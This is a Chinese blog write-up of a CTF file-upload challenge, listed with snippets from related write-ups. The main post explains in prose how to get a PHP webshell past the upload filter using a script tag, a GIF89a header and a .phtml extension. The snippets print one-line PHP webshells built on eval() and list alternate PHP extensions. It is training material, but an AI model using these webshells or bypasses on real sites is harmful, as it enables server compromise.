[极客大挑战 2019]Upload

最新推荐文章于 2024-08-22 09:44:18 发布
最新推荐文章于 2024-08-22 09:44:18 发布
阅读量251 收藏
点赞数
分类专栏: BUUCTF 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kracxi/article/details/122916797
版权

目录

思路

先上传一个包含shell的jpg文件

提示不能包含<?,可以用scrpt标签执行php代码来绕过
在这里插入图片描述
改为文件内容后上传,提示不是image,可能对文件内容做了检测,判断文件头是不是为image
在这里插入图片描述
在文件头添加GIF89a,改后缀为gif,上传成功

在这里插入图片描述
接下来把后缀名改成任意字符,上传成功,说明是黑名单过滤
在这里插入图片描述
把对后缀名逐个尝试后,发现改成phtml发现可以成功上传

在这里插入图片描述
不过没有告诉我文件路径在哪,盲猜一波 /upload/xxx

访问地址,回显成功

在这里插入图片描述
直接RCE拿到flag

总结

水题

Kradress
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[极客挑战 2019]Upload 1
chbeloved的博客
07-21 711
[极客挑战 2019]Upload 1 上传类题目,先上传一个一句话木马再说。 把文件后缀改成jpg php就用到了<? 那就改用script写 再用jpg上传 这都被看出来了,说明对文件内容检查,那就在文件内加个JPG89a (图片头文件欺骗) 但是不成功… 有点不死心,改成GIF89a 居然过了 说明是绕过了 接下来抓包,把jpg文件修改成phtml文件发挥作用 改第一处黄色标记那后缀phtml。然后点击go 上传成功了,访问试试。 看这结尾,一般都是upload/文件名 看来是
BUUCTF [极客挑战 2019]Upload
m0_49025459的博客
05-12 5038
这题目是文件上传漏洞 看到这种上传的漏洞,肯定就是上传一句话木马,我们写一个正常的一句话木马先上传试试 <?php phpinfo(); @eval($_POST['shell']); ?> 我们上传之后,提示我们不是image格式,那么我们上传的时候就抓一下包,修改一下上传的格式 Content-Type: image/jpeg 放包 这时候我们发现,文件的后缀不能为php,文件绕过的格式也有很php,php3,php4,php5,phtml....
Buuctf<极客挑战2019upload
m0_64444909的博客
04-07 5231
文章目录一.划重点的知识点二.解题步骤二、使用步骤1.引入库2.读入数据总结 一.划重点的知识点 GIF89a图片头文件欺骗: 一个GIF89a图形文件就是一个根据图形交换格式进行格式化之后的图形。用记事本编写一下内容,然后修改后缀变成图片 GIF89a <head> <meta http-equiv = "refresh" content = "1; url=http://www.***.com/" /> </head> 当单独查看此文件时,会出现G
极客挑战2019Upload解题
Bird&Bird
10-26 3809
1、打开BUUCTF在线评测,选择web---->【极客挑战2019Upload。 2、首先上一句话木马。 报错了,说明进行了前端过滤非图片格式文件。 3、 将文件后缀名改为.jpg后在上传。 报错,说明进行了后端过滤,文件内容不能包含'<?'。 4、修改文件内容,然后上传。 继续报错 应该是对图片头进行了校验,那添加图片头,然后上传。 终于上传成功了,但此时我们上传的是一个.jpg图片,利用不了。 5、通过bp抓包,并修改图片后...
(文件上传upload) [极客挑战 2019]Upload1 和 [ACTF2020新生赛]Upload1
一醉一休的博客
02-23 9656
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。 由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致用户可以越过其本身权限向服务器上传可执行的动态脚本文件。 一、[极客挑战 2019]Upload1 ...
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
此文档描述的是2019年三诺集团四周年庆典的一项独特活动——“极客摇滚跑”。这是一场集科技、运动和音乐于一体的大型庆典,旨在庆祝三诺集团的周年纪念,并促进北海市高新产业园及其相关企业的交流与合作。活动的...
ISCC2019个人挑战赛题目练习
05-05
【ISCC2019个人挑战赛题目练习】是一次针对网络安全技术的竞赛,旨在提升参赛者在信息安全领域的技能和实战经验。此类挑战通常涵盖多种技术领域,包括但不限于密码学、漏洞分析、网络嗅探、逆向工程、Web安全以及...
天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
极客学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 极客学院JAVA视频教程 新版 7大部分
【BUUCTF-Web】[极客挑战 2019]Upload
weixin_49298681的博客
01-05 1059
Upload=> 文件上传漏洞。
BUUCTF——[极客挑战2019]Upload-1
weixin_62248541的博客
11-25 526
BUUCTF-[极客挑战2019]Upload-1
BUUCTF-Web:[极客挑战 2019]Upload
m0_56161093的博客
05-29 869
题目 解题过程 1、上传文件 从网页上来看是上传一个图片文件,但我们不知道他的检查上传的文件,所以可以试一试上传各种文件。一般检查文件的地方有:后缀名、content-type、文件头的部分内容。 这里我们先上传一个php文件,不做任何修改。如下图: 结果如下: 2、修改文件后缀名和content-type 将文件名修改为test.phtml,绕过常规php文件后缀检测 将文件类型修改为:image/jpeg 注意:phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 修
文件上传 [极客挑战 2019]Upload 1
m0_75178803的博客
10-11 1019
上传失败了,应该是在后端也对我们的文件内容进行了检测,检测到我们的一句话木马里面包含
【BUUCTF】[极客挑战 2019] Upload Writeup
algae
08-26 690
【BUUCTF】[极客挑战 2019] Upload Writeup0x00 考点文件上传绕过可解析的php后缀名:0x01 解题 0x00 考点 文件上传绕过 带图片头的php一句话木马 可解析的php后缀名: php3,php4,php5,pht,phtml,phps,pht,phtm 0x01 解题 要求必须上传图片 带gif图片头的php一句话木马 GIF89a? <script language="php">eval($_REQUEST[a])</script&g
[极客挑战 2019]Upload1(详解)
2301_77451464的博客
02-04 807
这句话是不应该出现的,可能是文件名后缀不对,放在蚁剑上,发现不能打开。由此可知,图片是有一个图片头的,可以用010editer打开看一下。文件名demo.php。图片头为GIF89a。
推荐一个完全自由的目录设计网站
最新发布
qq_30049249的博客
08-22 421
因此,如果想在网站上写一本自己的书,我们需要一个目录设计的工具。现在,我们点击全部,看到自己的所有文章。这样,先创建各级栏目,再将文章拖动到各级栏目,就实现了对文章到整理。上面的链接提供参考,这里主要介绍其中的目录设计工具,也叫栏目设计。好,现在我们来出一本书,想一个名字,就叫《学习PHP动态网站开发》如果我们能通过网站出一本书,这将是一件很酷的事。事实上,我们通过网站发布知识,最常见的是写博客。先点击所有,查看子栏目和文章,然后进行拖动排序。好,本文说的是完全自由的目录设计,有多自由呢?
极客挑战 2019]EasySQL
09-03
EasySQL 是极客挑战 2019 中的一个题目,它是一个简单的 SQL 数据库查询题目。可以通过编写 SQL 查询语句来实现对给定的数据库表进行数据查询和分析。 在 EasySQL 中,你将面对一个包含不同表的数据库,你需要根据题目要求来编写 SQL 查询语句,从而得到正确的结果。这道题的目标是考察你对 SQL 查询语句的掌握程度和对数据库操作的理解。 在极客挑战 2019 中,EasySQL 是一个相对较简单的题目,旨在帮助参赛者熟悉 SQL 查询语句的基本使用和常见操作。通过解决这个问题,你将能够提高自己的 SQL 查询能力,并为更复杂的数据库操作打下基础。 如果你有关于 EasySQL 的具体问题,我可以帮助你更详细地解答。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值